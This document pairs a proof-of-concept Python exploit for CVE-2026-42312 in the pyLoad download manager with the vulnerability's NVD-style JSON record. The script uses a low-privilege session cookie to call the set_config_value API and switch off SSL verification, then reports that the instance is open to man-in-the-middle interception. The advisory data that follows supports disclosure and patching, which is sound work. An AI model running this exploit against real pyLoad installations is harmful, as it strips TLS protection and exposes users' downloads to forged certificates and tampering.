CVE-2026-42312

import requests # Target URL (change this to the actual pyLoad instance) TARGET_URL = "http://localhost:8000" API_PATH = "/api/set_config_value" # Attacker's credentials (low-privileged user with SETTINGS permission) SESSION_COOKIE = "session=low_priv_user_session_token" # The vulnerable configuration option PAYLOAD = { "category": "general", "key": "ssl_verify", "value": "off" } headers = { "Cookie": SESSION_COOKIE, "Content-Type": "application/json" } try: # Send the request to disable SSL verification response = requests.post(f"{TARGET_URL}{API_PATH}", json=PAYLOAD, headers=headers) if response.status_code == 200: print("[+] Successfully disabled SSL verification!") print("[+] Future requests will be vulnerable to MITM attacks.") else: print(f"[-] Failed to exploit. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2026-42312", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:34.833", "lastModified": "2026-05-11T20:25:42.430", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option (\"general\", \"ssl_verify\") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}, {"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9", "source": "[email protected]"}, {"url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}